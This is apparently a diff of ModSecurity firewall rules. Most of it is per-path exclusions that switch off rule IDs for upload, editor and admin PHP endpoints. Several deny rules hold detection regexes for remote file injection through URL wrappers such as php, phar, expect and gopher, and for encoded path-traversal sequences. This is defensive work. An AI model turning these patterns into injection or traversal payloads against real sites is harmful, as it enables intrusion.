+SecRule REQUEST_FILENAME "/wp-content/plugins/spostarbust/images/index\.php" "phase:2,id:91980,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/emailxmlasattachment\.ph" "phase:2,id:91981,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/console/manage_products\.php" "phase:2,id:91982,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/agents/uploader/doupload\.php" "phase:2,id:91983,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=380007"
+
+SecRule REQUEST_FILENAME "/wp-load\.php" "phase:2,id:91984,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=340094,ctl:ruleRemovebyID=390715"
+
+SecRule REQUEST_FILENAME "/textpattern/index\.php" "phase:2,id:91985,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/filemanager/filemanager\.php" "phase:2,id:91986,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/imagecrop\.php" "phase:2,id:91987,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91988,t:none,pass,nolog,skipAfter:END_RULES_91988"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"           "phase:2,deny,log,auditlog,status:403,capture,id:336633,t:none,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (AE)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+SecRule REQUEST_URI|ARGS|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/file/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:336634,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{TX.0}',chain"
+SecRule MATCHED_VAR "!@beginsWith http:/%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_91988
+
+SecRule REQUEST_FILENAME "/dashboard\.php" "phase:2,id:91989,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/ie-style\.php" "phase:2,id:91990,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340021"
+
+SecRule REQUEST_FILENAME "/plugins/likebox\.php" "phase:2,id:91991,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/bb_gate\.php" "phase:2,id:91992,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/imgprod\.php" "phase:2,id:91993,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/phpmyvisites\.php" "phase:2,id:91994,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/editpage\.php" "phase:2,id:91995,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/modules/mod_ajax_contact/ajax\.php" "phase:2,id:91996,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390703"
+
+SecRule REQUEST_FILENAME "/admin/artwork/index/upload_file" "phase:2,id:91997,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=380006"
+
+SecRule REQUEST_FILENAME "/admin/media/upload\.php" "phase:2,id:91998,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:91999,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/a_config_dt\.php" "phase:2,id:92000,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211"
+
+SecRule REQUEST_FILENAME "/aom/item/index\.php" "phase:2,id:92001,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/orders/ordersave\.php" "phase:2,id:92002,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/nucleus/index\.php" "phase:2,id:92003,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/save_post\.php" "phase:2,id:92004,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/provider/offers\.php" "phase:2,id:92005,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/plugins/wp-slimstat/wp-slimstat-js\.php" "phase:2,id:92006,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/editor/sitemanger/index\.php" "phase:2,id:92007,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/addclientvideo\.php" "phase:2,id:92008,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/single_upload\.php" "phase:2,id:92009,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/betrieb\.php" "phase:2,id:92010,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/wiki/lib/exe/fetch\.php" "phase:2,id:92011,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/wp-admin/press-this\.php" "phase:2,id:92012,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/pagine\.php" "phase:2,id:92013,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/admin/order-categories\.php" "phase:2,id:92014,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340145"
+
+SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:92015,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/livehelp/" "phase:2,id:92016,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:92017,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/livehelpnew/" "phase:2,id:92018,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/raidlogimport/admin/dkp\.php" "phase:2,id:92019,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/p\.php" "phase:2,id:92020,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:92021,t:none,pass,nolog,skipAfter:END_RULES_92021"
+
+
+SecRule REQUEST_URI|ARGS|!ARGS:t|!ARGS:/url/ "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  	"capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:378451,phase:2,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (MM)',logdata:'%{MATCHED_VAR}',chain"
+SecRule MATCHED_VARS "!@rx ://%{SERVER_NAME}/"
+
+
+SecMarker END_RULES_92021
+
+SecRule REQUEST_FILENAME "/admincp/verticalresponse\.php" "phase:2,id:92022,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340160,ctl:ruleRemovebyID=344371,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019,ctl:ruleRemovebyID=340155,ctl:ruleRemovebyID=344367,ctl:ruleRemovebyID=340145,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=331026,ctl:ruleRemovebyID=331027,ctl:ruleRemovebyID=331028,ctl:ruleRemovebyID=390572"
+
+SecRule REQUEST_FILENAME "/admin/editart\.php" "phase:2,id:92023,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/panel/content/itinerary\.php" "phase:2,id:92024,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/adminmailing\.php" "phase:2,id:92025,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/homepageedit\.php" "phase:2,id:92026,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/jobedit\.php" "phase:2,id:92027,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/media-upload\.php" "phase:2,id:92028,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=390707"
+
+SecRule REQUEST_FILENAME "/ndxz-studio" "phase:2,id:92029,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/ndxzstudio" "phase:2,id:92030,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/json\.php" "phase:2,id:92031,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/_salvaxml\.php" "phase:2,id:92032,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/imp/imple\.php" "phase:2,id:92033,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/cms/settings\.php" "phase:2,id:92034,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/destination-edit\.php" "phase:2,id:92035,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/posthtml\.php" "phase:2,id:92036,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/template_edit\.asp" "phase:2,id:92037,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=390727"
+
+SecRule REQUEST_FILENAME "/question/edit\.php" "phase:2,id:92038,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/cgi-bin/menu\.pl" "phase:2,id:92039,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/add_article\.php" "phase:2,id:92040,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/admin/update\.php" "phase:2,id:92041,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/wp-content/plugins/contactme/xd_receiver\.php" "phase:2,id:92042,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340163"
+
+SecRule REQUEST_FILENAME "/edit_home\.php" "phase:2,id:92043,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/update-news\.php" "phase:2,id:92044,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/mod/quiz/attempt\.php" "phase:2,id:92045,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340095"
+
+SecRule REQUEST_FILENAME "/linnworks_xml\.php" "phase:2,id:92046,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=380018"
+
+SecRule REQUEST_FILENAME "/order/saveeshop" "phase:2,id:92047,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/comments\.php" "phase:2,id:92048,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+SecAction "phase:2,id:92049,t:none,pass,nolog,skipAfter:END_RULES_92049"
+
+SecRule ARGS|!ARGS:/^resp/|!ARGS:rpath|!ARGS:data|!ARGS:/body/|!ARGS:editor1|!ARGS:/sidebar/|!ARGS:/template/|!ARGS:/desc/|!ARGS:resolution|!ARGS:/problem/|!ARGS:/solution/|!ARGS:/^style_options/|!ARGS:/CACHE_PATH/|!ARGS:connector|!ARGS:/comment/|!ARGS:obrazek|!ARGS:/txt/|!ARGS:keywords|!ARGS:/wysiwyg/|!ARGS:/ajax/|!ARGS:css_data|!ARGS:/text/|!ARGS:/message/|!ARGS:body|!ARGS:pagecontent|!ARGS:/html/|!ARGS:filecontent|!ARGS:content|!ARGS:filename|!ARGS:fck_body|!ARGS:text|!ARGS:/content/ "(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))(?:%(?:u2024|2e)|\.){2}(?:\x5c|(?:%(?:c(?:0%(?:9v|af)|1%1c)|2(?:5(?:2f|5c)|f)|u221[56]|1u|5c)|\/))"  	"deny,log,auditlog,status:403,t:none,t:lowercase,capture,id:343307,phase:2,rev:39,severity:2,msg:'Atomicorp.com WAF Rules: Generic Path Recursion denied',logdata:'%{TX.0}'"
+
+SecMarker END_RULES_92049
+
+SecRule REQUEST_FILENAME "/viewraid\.php" "phase:2,id:92050,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=340006"
+
+SecRule REQUEST_FILENAME "/twitter/tweets-grab\.php" "phase:2,id:92051,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/admin/set_label\.php" "phase:2,id:92052,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/index\.php/profile/register/registerprofile" "phase:2,id:92053,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/code_editor\.php" "phase:2,id:92054,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=380018-380021,ctl:ruleRemovebyID=340095,ctl:ruleRemovebyID=380026,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340006-340007,ctl:ruleRemovebyID=340011,ctl:ruleRemovebyID=340014,ctl:ruleRemovebyID=340193,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340017,ctl:ruleRemovebyID=340021,ctl:ruleRemovebyID=340027,ctl:ruleRemovebyID=340029,ctl:ruleRemovebyID=340118,ctl:ruleRemovebyID=340128,ctl:ruleRemovebyID=340131,ctl:ruleRemovebyID=340133,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340164,ctl:ruleRemovebyID=380006,ctl:ruleRemovebyID=390709,ctl:ruleRemovebyID=390715,ctl:ruleRemovebyID=390801,ctl:ruleRemovebyID=390810,ctl:ruleRemovebyID=393449"
+
+SecRule REQUEST_FILENAME "/popeditmarker\.php" "phase:2,id:92055,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/connectors/security/access/policy/template\.php" "phase:2,id:92056,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/modiwats\.php" "phase:2,id:92057,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=380016,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=390572,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/php-stats\.php" "phase:2,id:92058,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340163,ctl:ruleRemovebyID=340165"
+
+SecRule REQUEST_FILENAME "/banner-edit\.php" "phase:2,id:92059,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148"
+
+SecRule REQUEST_FILENAME "/content-edit\.php" "phase:2,id:92060,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
